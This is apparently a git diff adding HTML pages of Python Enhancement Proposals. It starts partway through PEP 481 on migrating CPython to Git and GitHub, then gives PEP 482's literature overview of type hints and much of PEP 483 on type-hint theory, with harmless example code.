For new contributors it increases the likelihood that they will have already +learned the basics of Git as part of working with another project or if they +are just now learning Git, that they’ll be able to take that knowledge and +apply it to other projects. Additionally a larger community means more people +writing how to guides, answering questions, and writing articles about Git +which makes it easier for a new user to find answers and information about +the tool they are trying to learn.

+

Another benefit is that by nature of having a larger community, there will be +more tooling written around it. This increases options for everything from +GUI clients, helper scripts, repository hosting, etc.

+
+
+

Repository Hosting

+

This PEP proposes allowing GitHub Pull Requests to be submitted, however GitHub +does not have a way to submit Pull Requests against a repository that is not +hosted on GitHub. This PEP also proposes that in addition to GitHub Pull +Requests Phabricator’s Differential app can also be used to submit proposed +changes and Phabricator does allow submitting changes against a repository +that is not hosted on Phabricator.

+

For this reason this PEP proposes using GitHub as the canonical location of +the repository with a read-only mirror located in Phabricator. If at some point +in the future GitHub is no longer desired, then repository hosting can easily +be moved to solely in Phabricator and the ability to accept GitHub Pull +Requests dropped.

+

In addition to hosting the repositories on Github, a read only copy of all +repositories will also be mirrored onto the PSF Infrastructure.

+
+
+

Code Review

+

Currently CPython uses a custom fork of Rietveld which has been modified to +not run on Google App Engine which is really only able to be maintained +currently by one person. In addition it is missing out on features that are +present in many modern code review tools.

+

This PEP proposes allowing both Github Pull Requests and Phabricator changes +to propose changes and review code. It suggests both so that contributors can +select which tool best enables them to submit changes, and reviewers can focus +on reviewing changes in the tooling they like best.

+
+

GitHub Pull Requests

+

GitHub is a very popular code hosting site and is increasingly becoming the primary place people look to contribute to a project. Enabling users to contribute through GitHub lets contributors work with tooling that they are likely already familiar with; and if they are not, the skills they learn are likely to apply to other projects as well.

+

GitHub Pull Requests have a fairly major advantage over the older “submit a +patch to a bug tracker” model. It allows developers to work completely within +their VCS using standard VCS tooling so it does not require creating a patch +file and figuring out what the right location is to upload it to. This lowers +the barrier for sending a change to be reviewed.

+

On the reviewing side, GitHub Pull Requests are far easier to review, they have +nice syntax highlighted diffs which can operate in either unified or side by +side views. They allow expanding the context on a diff up to and including the +entire file. Finally they allow commenting inline and on the pull request as +a whole and they present that in a nice unified way which will also hide +comments which no longer apply. Github also provides a “rendered diff” view +which enables easily viewing a diff of rendered markup (such as rst) instead +of needing to review the diff of the raw markup.

+

The Pull Request work flow also makes it trivial to enable the ability to +pre-test a change before actually merging it. Any particular pull request can +have any number of different types of “commit statuses” applied to it, marking +the commit (and thus the pull request) as either in a pending, successful, +errored, or failure state. This makes it easy to see inline if the pull request +is passing all of the tests, if the contributor has signed a CLA, etc.

+

Actually merging a GitHub Pull Request is quite simple: a core reviewer simply needs to press the “Merge” button once all of the checks on the Pull Request are green for successful.

+

GitHub also has a good workflow for submitting pull requests to a project +completely through their web interface. This would enable the Python +documentation to have “Edit on GitHub” buttons on every page and people who +discover things like typos, inaccuracies, or just want to make improvements to +the docs they are currently writing can simply hit that button and get an in +browser editor that will let them make changes and submit a pull request all +from the comfort of their browser.

+
+
+

Phabricator

+

In addition to GitHub Pull Requests this PEP also proposes setting up a +Phabricator instance and pointing it at the GitHub hosted repositories. This +will allow utilizing the Phabricator review applications of Differential and +Audit.

+

Differential functions similarly to GitHub pull requests except that they +require installing the arc command line tool to upload patches to +Phabricator.

+

Whether to enable Phabricator for any particular repository can be chosen on +a case-by-case basis, this PEP only proposes that it must be enabled for the +CPython repository, however for smaller repositories such as the PEP repository +it may not be worth the effort.

+
+
+
+
+

Criticism

+
+

X is not written in Python

+

One feature that the current tooling (Mercurial, Rietveld) has is that the primary language of all the pieces is Python. It is this PEP’s belief that we should focus on the best tools for the job and not the best tools that happen to be written in Python. Volunteer time is a precious resource to any open source project and we can best respect and utilize that time by focusing on the benefits and downsides of the tools themselves rather than what language their authors happened to write them in.

+

One concern is the ability to modify tools to work for us, however one of +the Goals here is to not modify software to work for us and instead adapt +ourselves to a more standard workflow. This standardization pays off in the +ability to re-use tools out of the box freeing up developer time to actually +work on Python itself as well as enabling knowledge sharing between projects.

+

However, if we do need to modify the tooling, Git itself is largely written in C, the same as CPython itself. It can also have commands written for it in any language, including Python. Phabricator is written in PHP, which is a fairly common language in the web world and fairly easy to pick up. GitHub itself is largely written in Ruby, but given that it is not Open Source there is no ability to modify it, so its implementation language is completely meaningless.

+
+
+

GitHub is not Free/Open Source

+

GitHub is a big part of this proposal and someone who tends more to ideology rather than practicality may be opposed to this PEP on those grounds alone. It is this PEP’s belief that while using entirely Free/Open Source software is an attractive idea and a noble goal, valuing the time of the contributors, by giving them good tooling that is well maintained and that they either already know or can apply to other projects once learned, is a more important concern than treating Free/Open Source as a hard requirement.

+

However, history has shown us that sometimes benevolent proprietary companies +can stop being benevolent. This is hedged against in a few ways:

+
• We are not utilizing the GitHub Issue Tracker, both because it is not powerful enough for CPython but also because for the primary CPython repository the ability to take our issues and put them somewhere else if we ever need to leave GitHub relies on GitHub continuing to allow API access.
• We are utilizing the GitHub Pull Request workflow, however all of those changes live inside of Git. So a mirror of the GitHub repositories can easily contain all of those Pull Requests. We would potentially lose any comments if GitHub suddenly turned “evil”, but the changes themselves would still exist.
• We are utilizing the GitHub repository hosting feature, however since this is just git, moving away from GitHub is as simple as pushing the repository to a different location. Data portability for the repository itself is extremely high.
• We are also utilizing Phabricator to provide an alternative for people who do not wish to use GitHub. This also acts as a fallback option which will already be in place if we ever need to stop using GitHub.

Relying on GitHub comes with a number of benefits beyond just the benefits of +the platform itself. Since it is a commercially backed venture it has a full-time +staff responsible for maintaining its services. This includes making sure +they stay up, making sure they stay patched for various security +vulnerabilities, and further improving the software and infrastructure as time +goes on.

+
+
+

Mercurial is better than Git

+

Whether Mercurial or Git is better on a technical level is a highly subjective +opinion. This PEP does not state whether the mechanics of Git or Mercurial are +better, and instead focuses on the network effect available with either +option. Since this PEP proposes switching to Git, this leaves out the people +who prefer Mercurial; however, those users can easily continue to work with +Mercurial by using the hg-git [2] extension for Mercurial, which lets it work +with a repository that is Git on the server side.

+
+
+

CPython Workflow is too Complicated

+

One sentiment that came out of previous discussions was that the multi-branch +model of CPython is too complicated for GitHub Pull Requests. It is the belief +of this PEP that this statement is not accurate.

+

Currently any particular change requires manually creating a patch for 2.7 +and 3.x, which won’t change at all in this regard.

+

If someone submits a fix for the current stable branch (currently 3.4), the +GitHub Pull Request workflow can be used to create, in the browser, a Pull +Request to merge the current stable branch into the master branch (assuming +there are no merge conflicts). A merge conflict would still need to be +handled locally. This provides an improvement over the current situation, +where the merge must always happen locally.

+

Finally, if someone submits a fix for the current development branch, it +currently has to be manually applied to the stable branch if it is desired +there as well. This must also happen locally in the new workflow; however, +for minor changes it could easily be accomplished in the GitHub web editor.

+

Looking at this, I do not believe that any system can hide the complexities +involved in maintaining several long-running branches. The only thing the +tooling can do is make it as easy as possible to submit changes.

+
+
+
+

Example: Scientific Python

+

One of the key ideas behind the move to both Git and GitHub is that a major +feature of a DVCS, of repository hosting, and of the chosen workflow is the +social network and the size of the community using those tools. We can see +this is true by looking at an example from a sub-community of the Python +community: the Scientific Python community. They have already migrated most +of the key pieces of the SciPy stack onto GitHub using the Pull Request-based +workflow. This process started with IPython, and as more projects moved over +it became a natural default for new projects in the community.

+

They claim to have seen a great benefit from this move, in that it enables +casual contributors to move easily between different projects within their +sub-community without having to learn a special, bespoke workflow and a +different toolchain for each project. They’ve found that when people can +spend their limited time on actually contributing instead of learning +different tools and workflows, not only do they contribute more to one +project, but they also branch out and contribute to other projects. This move +has also been credited with an increased tendency for members of that +community to go so far as publishing their research and educational materials +on GitHub as well.

+

This example showcases the real power behind moving to a highly popular +toolchain and workflow: each variation introduces yet another hurdle for new +and casual contributors to get past, and it makes the time spent learning +that workflow less reusable with other projects.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0481.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0482/index.html b/pep-0482/index.html new file mode 100644 index 00000000000..c2469ca2f93 --- /dev/null +++ b/pep-0482/index.html @@ -0,0 +1,325 @@ + + + + + + + + PEP 482 – Literature Overview for Type Hints | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 482 – Literature Overview for Type Hints

+
+
Author:
+
Łukasz Langa <lukasz at python.org>
+
Discussions-To:
+
Python-Ideas list
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Typing
+
Created:
+
08-Jan-2015
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP is one of three related to type hinting. This PEP gives a +literature overview of related work. The main spec is PEP 484.

+
+
+

Existing Approaches for Python

+
+

mypy

+

(This section is a stub, since mypy is essentially what we’re +proposing.)

+
+
+

Reticulated Python

+

Reticulated Python by Michael Vitousek is an example of +a slightly different approach to gradual typing for Python. It is +described in an actual academic paper written by +Vitousek with Jeremy Siek and Jim Baker (the latter of Jython fame).

+
+
+

PyCharm

+

PyCharm by JetBrains has been providing a way to specify and check +types for about four years. The type system suggested by PyCharm +grew from simple class types to tuple types, generic types, +function types, etc. based on feedback of many users who shared their +experience of using type hints in their code.

+
+
+

Others

+

TBD: Add sections on pyflakes, pylint, numpy, +Argument Clinic, pytypedecl, numba, obiwan.

+
+
+
+

Existing Approaches in Other Languages

+
+

ActionScript

+

ActionScript is a class-based, single inheritance, +object-oriented superset of ECMAScript. It supports interfaces and +strong runtime-checked static typing. Compilation supports a “strict +dialect” where type mismatches are reported at compile-time.

+

Example code with types:

+
package {
+  import flash.events.Event;
+
+  public class BounceEvent extends Event {
+    public static const BOUNCE:String = "bounce";
+    private var _side:String = "none";
+
+    public function get side():String {
+      return _side;
+    }
+
+    public function BounceEvent(type:String, side:String){
+      super(type, true);
+      _side = side;
+    }
+
+    public override function clone():Event {
+      return new BounceEvent(type, _side);
+    }
+  }
+}
+
+
+
+
+

Dart

+

Dart is a class-based, single inheritance, object-oriented +language with C-style syntax. It supports interfaces, abstract classes, +reified generics, and optional typing.

+

Types are inferred when possible. The runtime differentiates between two +modes of execution: checked mode, aimed at development (catching type +errors at runtime), and production mode, recommended for fast execution +(ignoring types and asserts).

+

Example code with types:

+
class Point {
+    final num x, y;
+
+    Point(this.x, this.y);
+
+    num distanceTo(Point other) {
+        var dx = x - other.x;
+        var dy = y - other.y;
+        return math.sqrt(dx * dx + dy * dy);
+    }
+}
+
+
+
+
+

Hack

+

Hack is a programming language that interoperates seamlessly +with PHP. It provides opt-in static type checking, type aliasing, +generics, nullable types, and lambdas.

+

Example code with types:

+
<?hh
+class MyClass {
+  private ?string $x = null;
+
+  public function alpha(): int {
+    return 1;
+  }
+
+  public function beta(): string {
+    return 'hi test';
+  }
+}
+
+function f(MyClass $my_inst): string {
+  // Will generate a hh_client error
+  return $my_inst->alpha();
+}
+
+
+
+
+

TypeScript

+

TypeScript is a typed superset of JavaScript that adds +interfaces, classes, mixins and modules to the language.

+

Type checks are duck typed. Multiple valid function signatures are +specified by supplying overloaded function declarations. Functions and +classes can use generics as type parameterization. Interfaces can have +optional fields. Interfaces can specify array and dictionary types. +Classes can have constructors that implicitly add arguments as fields. +Classes can have static fields. Classes can have private fields. +Classes can have getters/setters for fields (like property). Types are +inferred.

+

Example code with types:

+
interface Drivable {
+    start(): void;
+    drive(distance: number): boolean;
+    getPosition(): number;
+}
+
+class Car implements Drivable {
+    private _isRunning: boolean;
+    private _distanceFromStart: number;
+
+    constructor() {
+        this._isRunning = false;
+        this._distanceFromStart = 0;
+    }
+
+    public start() {
+        this._isRunning = true;
+    }
+
+    public drive(distance: number): boolean {
+        if (this._isRunning) {
+            this._distanceFromStart += distance;
+            return true;
+        }
+        return false;
+    }
+
+    public getPosition(): number {
+        return this._distanceFromStart;
+    }
+}
+
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0482.rst

+

Last modified: 2024-08-20 10:29:32 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0483/index.html b/pep-0483/index.html new file mode 100644 index 00000000000..15bcb03b3d0 --- /dev/null +++ b/pep-0483/index.html @@ -0,0 +1,911 @@ + + + + + + + + PEP 483 – The Theory of Type Hints | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 483 – The Theory of Type Hints

+
+
Author:
+
Guido van Rossum <guido at python.org>, Ivan Levkivskyi <levkivskyi at gmail.com>
+
Discussions-To:
+
Python-Ideas list
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Typing
+
Created:
+
19-Dec-2014
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP lays out the theory referenced by PEP 484.

+
+
+

Introduction

+

This document lays out the theory of the new type hinting proposal for +Python 3.5. It’s not quite a full proposal or specification because +there are many details that need to be worked out, but it lays out the +theory without which it is hard to discuss more detailed specifications. +We start by recalling basic concepts of type theory; then we explain +gradual typing; then we state some general rules and +define the new special types (such as Union) that can be used +in annotations; and finally we define the approach to generic types +and pragmatic aspects of type hinting.

+
+

Notational conventions

+
    +
  • t1, t2, etc. and u1, u2, etc. are types. Sometimes we write +ti or tj to refer to “any of t1, t2, etc.”
  • +
  • T, U etc. are type variables (defined with TypeVar(), see below).
  • +
  • Objects, classes defined with a class statement, and instances are +denoted using standard PEP 8 conventions.
  • +
  • the symbol == applied to types in the context of this PEP means that +two expressions represent the same type.
  • +
  • Note that PEP 484 makes a distinction between types and classes +(a type is a concept for the type checker, +while a class is a runtime concept). In this PEP we clarify +this distinction but avoid unnecessary strictness to allow more +flexibility in the implementation of type checkers.
  • +
+
+
+
+

Background

+

There are many definitions of the concept of type in the literature. +Here we assume that a type is a set of values and a set of functions that +one can apply to these values.

+

There are several ways to define a particular type:

+
    +
  • By explicitly listing all values. E.g., True and False +form the type bool.
  • +
  • By specifying functions which can be used with variables of +a type. E.g. all objects that have a __len__ method form +the type Sized. Both [1, 2, 3] and 'abc' belong to +this type, since one can call len on them:
    len([1, 2, 3])  # OK
    +len('abc')      # also OK
    +len(42)         # not a member of Sized
    +
    +
    +
  • +
  • By a simple class definition, for example if one defines a class:
    class UserID(int):
    +    pass
    +
    +
    +

    then all instances of this class also form a type.

    +
  • +
  • There are also more complex types. E.g., one can define the type +FancyList as all lists containing only instances of int, str +or their subclasses. The value [1, 'abc', UserID(42)] has this type +(a sketch spelling this out follows the list).
  • +
+
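 
As a hedged sketch in PEP 484 notation (the alias spelling below is ours and +purely illustrative; this PEP does not itself define FancyList), the type +from the last bullet could be written as:
 
+
from typing import List, Union
+
+class UserID(int):
+    pass
+
+FancyList = List[Union[int, str]]
+
+value = [1, 'abc', UserID(42)]  # type: FancyList
+
+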

It is important for the user to be able to define types in a form +that can be understood by type checkers. +The goal of this PEP is to propose such a systematic way of defining types +for type annotations of variables and functions using PEP 3107 syntax. +These annotations can be used to avoid many kinds of bugs, for documentation +purposes, or maybe even to increase the speed of program execution. +Here we only focus on avoiding bugs by using a static type checker.

+
+

Subtype relationships

+

A crucial notion for a static type checker is the subtype relationship. +It arises from the question: If first_var has type first_type, and +second_var has type second_type, is it safe to assign +first_var = second_var?

+

A strong criterion for when it should be safe is:

+
    +
  • every value from second_type is also in the set of values +of first_type; and
  • +
  • every function from first_type is also in the set of functions +of second_type.
  • +
+

The relation defined thus is called a subtype relation.

+

By this definition:

+
    +
  • Every type is a subtype of itself.
  • +
  • The set of values becomes smaller in the process of subtyping, +while the set of functions becomes larger.
  • +
+

An intuitive example: every Dog is an Animal, and Dog also has more +functions, for example it can bark; therefore Dog is a subtype of Animal. +Conversely, Animal is not a subtype of Dog.

+

A more formal example: integers are a subtype of real numbers. +Indeed, every integer is of course also a real number, and integers +support more operations, such as, e.g., bitwise shifts << and >>:

+
lucky_number = 3.14    # type: float
+lucky_number = 42      # Safe
+lucky_number * 2       # This works
+lucky_number << 5      # Fails
+
+unlucky_number = 13    # type: int
+unlucky_number << 5    # This works
+unlucky_number = 2.72  # Unsafe
+
+
+

Let us also consider a tricky example: If List[int] denotes the type +formed by all lists containing only integer numbers, +then it is not a subtype of List[float], formed by all lists that contain +only real numbers. The first condition of subtyping holds, +but appending a real number only works with List[float] so that +the second condition fails:

+
def append_pi(lst: List[float]) -> None:
+    lst += [3.14]
+
+my_list = [1, 3, 5]  # type: List[int]
+
+append_pi(my_list)   # Naively, this should be safe...
+
+my_list[-1] << 5     # ... but this fails
+
+
+

There are two widespread approaches to declaring subtype information +to a type checker.

+

In nominal subtyping, the type tree is based on the class tree, +i.e., UserID is considered a subtype of int. +This approach should be used under control of the type checker, +because in Python one can override attributes in an incompatible way:

+
class Base:
+    answer = '42' # type: str
+
+class Derived(Base):
+    answer = 5 # should be marked as error by type checker
+
+
+

In structural subtyping the subtype relation is deduced from the +declared methods, i.e., UserID and int would be considered the same type. +While this may occasionally cause confusion, +structural subtyping is considered more flexible. +We strive to provide support for both approaches, so that +structural information can be used in addition to nominal subtyping.
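 
As a hedged sketch of structural subtyping (using typing.Protocol, which was +standardized later by PEP 544 and is not part of this PEP; all names below +are ours):
 
+
from typing import Protocol  # Python 3.8+
+
+class SupportsClose(Protocol):
+    def close(self) -> None: ...
+
+class Resource:  # note: does not inherit from SupportsClose
+    def close(self) -> None:
+        print("closed")
+
+def shutdown(resource: SupportsClose) -> None:
+    resource.close()
+
+shutdown(Resource())  # accepted structurally: Resource has a matching close()
+
+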

+
+
+
+

Summary of gradual typing

+

Gradual typing allows one to annotate only part of a program, +thus leveraging desirable aspects of both dynamic and static typing.

+

We define a new relationship, is-consistent-with, which is similar to +is-subtype-of, except it is not transitive when the new type Any is +involved. (Neither relationship is symmetric.) Assigning a_value +to a_variable is OK if the type of a_value is consistent with +the type of a_variable. (Compare this to “… if the type of a_value +is a subtype of the type of a_variable”, which states one of the +fundamentals of OO programming.) The is-consistent-with relationship is +defined by three rules:

+
    +
  • A type t1 is consistent with a type t2 if t1 is a +subtype of t2. (But not the other way around.)
  • +
  • Any is consistent with every type. (But Any is not a subtype +of every type.)
  • +
  • Every type is consistent with Any. (But every type is not a subtype +of Any.)
  • +
+

That’s all! See Jeremy Siek’s blog post What is Gradual +Typing +for a longer explanation and motivation. Any can be considered a type +that has all values and all methods. Combined with the definition of +subtyping above, this places Any partially at the top (it has all values) +and bottom (it has all methods) of the type hierarchy. Contrast this to +object – it is not consistent with +most types (e.g. you can’t use an object() instance where an +int is expected). IOW both Any and object mean +“any type is allowed” when used to annotate an argument, but only Any +can be passed no matter what type is expected (in essence, Any +declares a fallback to dynamic typing and shuts up complaints +from the static checker).
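 
To illustrate the last point, here is a brief sketch (the names are ours, +purely illustrative) contrasting Any with object:
 
+
from typing import Any
+
+def need_int(x: int) -> int:
+    return x + 1
+
+def demo(a: Any, o: object) -> None:
+    need_int(a)  # OK: Any is consistent with int
+    need_int(o)  # rejected by a static checker: object is not consistent with int
+
+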

+

Here’s an example showing how these rules work out in practice:

+

Say we have an Employee class, and a subclass Manager:

+
class Employee: ...
+class Manager(Employee): ...
+
+
+

Let’s say variable worker is declared with type Employee:

+
worker = Employee()  # type: Employee
+
+
+

Now it’s okay to assign a Manager instance to worker (rule 1):

+
worker = Manager()
+
+
+

It’s not okay to assign an Employee instance to a variable declared with +type Manager:

+
boss = Manager()  # type: Manager
+boss = Employee()  # Fails static check
+
+
+

However, suppose we have a variable whose type is Any:

+
something = some_func()  # type: Any
+
+
+

Now it’s okay to assign something to worker (rule 2):

+
worker = something  # OK
+
+
+

Of course it’s also okay to assign worker to something (rule 3), +but we didn’t need the concept of consistency for that:

+
something = worker  # OK
+
+
+
+

Types vs. Classes

+

In Python, classes are object factories defined by the class statement, +and returned by the type(obj) built-in function. A class is a dynamic, +runtime concept.

+

The type concept is described above: types appear in variable +and function type annotations, can be constructed +from the building blocks described below, and are used by static type +checkers.

+

Every class is a type, as discussed above. +But it is tricky and error-prone to implement a class that exactly represents +the semantics of a given type, and it is not a goal of PEP 484. +The static types described in PEP 484 should not be confused with +the runtime classes. Examples:

+
    +
  • int is a class and a type.
  • +
  • UserID is a class and a type.
  • +
  • Union[str, int] is a type but not a proper class:
    class MyUnion(Union[str, int]): ...  # raises TypeError
    +
    +Union[str, int]()  # raises TypeError
    +
    +
    +
  • +
+

The typing interface is implemented with classes, i.e., at runtime it is +possible to evaluate, e.g., Generic[T].__bases__. But to emphasize the +distinction between classes and types the following general rules apply:

+
    +
  • No types defined below (i.e. Any, Union, etc.) can be instantiated; +an attempt to do so will raise TypeError. +(But non-abstract subclasses of Generic can be.)
  • +
  • No types defined below can be subclassed, except for Generic and +classes derived from it.
  • +
  • All of these will raise TypeError if they appear +in isinstance or issubclass (except for unparameterized generics).
  • +
+
+
+

Fundamental building blocks

+
    +
  • Any. Every type is consistent with Any; and +it is also consistent with every type (see above).
  • +
  • Union[t1, t2, …]. Types that are subtype of at least one of +t1 etc. are subtypes of this.
      +
    • Unions whose components are all subtypes of t1 etc. are subtypes +of this. +Example: Union[int, str] is a subtype of Union[int, float, str].
    • +
    • The order of the arguments doesn’t matter. +Example: Union[int, str] == Union[str, int].
    • +
    • If ti is itself a Union the result is flattened. +Example: Union[int, Union[float, str]] == Union[int, float, str].
    • +
    • If ti and tj have a subtype relationship, +the less specific type survives. +Example: Union[Employee, Manager] == Union[Employee].
    • +
    • Union[t1] returns just t1. Union[] is illegal, +so is Union[()]
    • +
    • Corollary: Union[..., object, ...] returns object.
    • +
    +
  • +
  • Optional[t1]. Alias for Union[t1, None], i.e. Union[t1, +type(None)].
  • +
  • Tuple[t1, t2, …, tn]. A tuple whose items are instances of t1, +etc. Example: Tuple[int, float] means a tuple of two items, the +first is an int, the second is a float; e.g., (42, 3.14).
      +
    • Tuple[u1, u2, ..., um] is a subtype of Tuple[t1, t2, ..., tn] +if they have the same length n==m and each ui +is a subtype of ti.
    • +
    • To spell the type of the empty tuple, use Tuple[()].
    • +
    • A variadic homogeneous tuple type can be written Tuple[t1, ...]. +(That’s three dots, a literal ellipsis; +and yes, that’s a valid token in Python’s syntax.)
    • +
    +
  • +
  • Callable[[t1, t2, …, tn], tr]. A function with positional +argument types t1 etc., and return type tr. The argument list may be +empty n==0. There is no way to indicate optional or keyword +arguments, nor varargs, but you can say the argument list is entirely +unchecked by writing Callable[..., tr] (again, a literal ellipsis).
  • +
+
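 
To make the building blocks above concrete, here is a small sketch (the names +parse_port, Endpoint and Handler are ours, purely illustrative):
 
+
from typing import Callable, Optional, Tuple, Union
+
+Endpoint = Tuple[str, int]            # e.g. ('localhost', 8080)
+
+def parse_port(raw: Union[str, int]) -> Optional[int]:
+    # Optional[int] is Union[int, None]; None signals "could not parse".
+    try:
+        port = int(raw)
+    except ValueError:
+        return None
+    return port if 0 < port < 65536 else None
+
+Handler = Callable[[Endpoint], None]  # one positional Endpoint argument, returns None
+
+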

We might add:

+
    +
  • Intersection[t1, t2, …]. Types that are subtype of each of +t1, etc are subtypes of this. (Compare to Union, which has at +least one instead of each in its definition.)
      +
    • The order of the arguments doesn’t matter. Nested intersections +are flattened, e.g. Intersection[int, Intersection[float, str]] +== Intersection[int, float, str].
    • +
    • An intersection of fewer types is a supertype of an intersection of +more types, e.g. Intersection[int, str] is a supertype +of Intersection[int, float, str].
    • +
    • An intersection of one argument is just that argument, +e.g. Intersection[int] is int.
    • +
    • When argument have a subtype relationship, the more specific type +survives, e.g. Intersection[str, Employee, Manager] is +Intersection[str, Manager].
    • +
    • Intersection[] is illegal, so is Intersection[()].
    • +
    • Corollary: Any disappears from the argument list, e.g. +Intersection[int, str, Any] == Intersection[int, str]. +Intersection[Any, object] is object.
    • +
    • The interaction between Intersection and Union is complex but +should be no surprise if you understand the interaction between +intersections and unions of regular sets (note that sets of types can be +infinite in size, since there is no limit on the number +of new subclasses).
    • +
    +
  • +
+
+
+
+

Generic types

+

The fundamental building blocks defined above allow one to construct new +types in a generic manner. For example, Tuple can take a concrete type float +and make a concrete type Vector = Tuple[float, ...], or it can take +another type UserID and make another concrete type +Registry = Tuple[UserID, ...]. Such a construct is known as a generic type +constructor; it is similar to a function, but while a function takes +a value and returns a value, a generic type constructor takes a type and +“returns” a type.

+

It is common for a particular class or function to behave in such a +type-generic manner. Consider two examples:

+
    +
  • Container classes, such as list or dict, typically contain only +values of a particular type. Therefore, a user might want to type annotate +them as such:
    users = [] # type: List[UserID]
    +users.append(UserID(42)) # OK
    +users.append('Some guy') # Should be rejected by the type checker
    +
    +examples = {} # type: Dict[str, Any]
    +examples['first example'] = object() # OK
    +examples[2] = None                   # rejected by the type checker
    +
    +
    +
  • +
  • The following function can take two arguments of type int and return +an int, or take two arguments of type float and return +a float, etc.:
    def add(x, y):
    +    return x + y
    +
    +add(1, 2) == 3
    +add('1', '2') == '12'
    +add(2.7, 3.5) == 6.2
    +
    +
    +
  • +
+

To allow type annotations in situations from the first example, built-in +containers and container abstract base classes are extended with type +parameters, so that they behave as generic type constructors. +Classes that behave as generic type constructors are called generic types. +Example:

+
from typing import Iterable
+
+class Task:
+    ...
+
+def work(todo_list: Iterable[Task]) -> None:
+    ...
+
+
+

Here Iterable is a generic type that takes a concrete type Task +and returns a concrete type Iterable[Task].

+

Functions that behave in a type-generic manner (as in the second example) +are called generic functions. +Type annotations of generic functions are enabled by type variables. +Their semantics with respect to generic types is somewhat similar +to the semantics of parameters in functions. But one does not assign +concrete types to type variables; it is the task of a static type checker +to find their possible values and warn the user if it cannot. +Example:

+
def take_first(seq: Sequence[T]) -> T: # a generic function
+    return seq[0]
+
+accumulator = 0 # type: int
+
+accumulator += take_first([1, 2, 3])   # Safe, T deduced to be int
+accumulator += take_first((2.7, 3.5))  # Unsafe
+
+
+

Type variables are used extensively in type annotations; the internal +machinery of type inference in type checkers is also typically built on +type variables. Therefore, let us consider them in detail.

+
+

Type variables

+

X = TypeVar('X') declares a unique type variable. The name must match +the variable name. By default, a type variable ranges +over all possible types. Example:

+
def do_nothing(one_arg: T, other_arg: T) -> None:
+    pass
+
+do_nothing(1, 2)               # OK, T is int
+do_nothing('abc', UserID(42))  # also OK, T is object
+
+
+

Y = TypeVar('Y', t1, t2, ...). Ditto, constrained to t1, etc. Behaves +similarly to Union[t1, t2, ...]. A constrained type variable ranges only +over the constraints t1, etc. exactly; subclasses of the constraints are +replaced by the most-derived base class among t1, etc. Examples:

+
    +
  • Function type annotation with a constrained type variable:
    AnyStr = TypeVar('AnyStr', str, bytes)
    +
    +def longest(first: AnyStr, second: AnyStr) -> AnyStr:
    +    return first if len(first) >= len(second) else second
    +
    +result = longest('a', 'abc')  # The inferred type for result is str
    +
    +result = longest('a', b'abc')  # Fails static type check
    +
    +
    +

    In this example, both arguments to longest() must have the same type +(str or bytes), and moreover, even if the arguments are instances +of a common str subclass, the return type is still str, not that +subclass (see next example).

    +
  • +
  • For comparison, if the type variable was unconstrained, the common +subclass would be chosen as the return type, e.g.:
    S = TypeVar('S')
    +
    +def longest(first: S, second: S) -> S:
    +    return first if len(first) >= len(second) else second
    +
    +class MyStr(str): ...
    +
    +result = longest(MyStr('a'), MyStr('abc'))
    +
    +
    +

    The inferred type of result is MyStr (whereas in the AnyStr example +it would be str).

    +
  • +
  • Also for comparison, if a Union is used, the return type also has to be +a Union:
    U = Union[str, bytes]
    +
    +def longest(first: U, second: U) -> U:
    +    return first if len(first) >= len(second) else second
    +
    +result = longest('a', 'abc')
    +
    +
    +

    The inferred type of result is still Union[str, bytes], even though +both arguments are str.

    +

    Note that the type checker will reject this function:

    +
    def concat(first: U, second: U) -> U:
    +    return first + second  # Error: can't concatenate str and bytes
    +
    +
    +

    For such cases, where parameters can change their types only +simultaneously, one should use constrained type variables.

    +
  • +
+
+
+

Defining and using generic types

+

Users can declare their classes as generic types using +the special building block Generic. The definition +class MyGeneric(Generic[X, Y, ...]): ... defines a generic type +MyGeneric over type variables X, etc. MyGeneric itself becomes +parameterizable, e.g. MyGeneric[int, str, ...] is a specific type with +substitutions X -> int, etc. Example:

+
class CustomQueue(Generic[T]):
+
+    def put(self, task: T) -> None:
+        ...
+    def get(self) -> T:
+        ...
+
+def communicate(queue: CustomQueue[str]) -> Optional[str]:
+    ...
+
+
+

Classes that derive from generic types become generic. +A class can subclass multiple generic types. However, +classes derived from specific types returned by generics are +not generic. Examples:

+
class TodoList(Iterable[T], Container[T]):
+    def check(self, item: T) -> None:
+        ...
+
+def check_all(todo: TodoList[T]) -> None:  # TodoList is generic
+    ...
+
+class URLList(Iterable[bytes]):
+    def scrape_all(self) -> None:
+        ...
+
+def search(urls: URLList) -> Optional[bytes]:  # URLList is not generic
+    ...
+
+
+

Subclassing a generic type imposes the subtype relation on the corresponding +specific types, so that TodoList[t1] is a subtype of Iterable[t1] +in the above example.

+

Generic types can be specialized (indexed) in several steps. +Every type variable could be substituted by a specific type +or by another generic type. If Generic appears in the base class list, +then it should contain all type variables, and the order of type parameters is +determined by the order in which they appear in Generic. Examples:

+
Table = Dict[int, T]     # Table is generic
+Messages = Table[bytes]  # Same as Dict[int, bytes]
+
+class BaseGeneric(Generic[T, S]):
+    ...
+
+class DerivedGeneric(BaseGeneric[int, T]): # DerivedGeneric has one parameter
+    ...
+
+SpecificType = DerivedGeneric[int]         # OK
+
+class MyDictView(Generic[S, T, U], Iterable[Tuple[U, T]]):
+    ...
+
+Example = MyDictView[list, int, str]       # S -> list, T -> int, U -> str
+
+
+

If a generic type appears in a type annotation with a type variable omitted, +it is assumed to be Any. Such a form can be used as a fallback +to dynamic typing and is allowed for use with issubclass +and isinstance. All type information in instances is erased at runtime. +Examples:

+
def count(seq: Sequence) -> int:      # Same as Sequence[Any]
+    ...
+
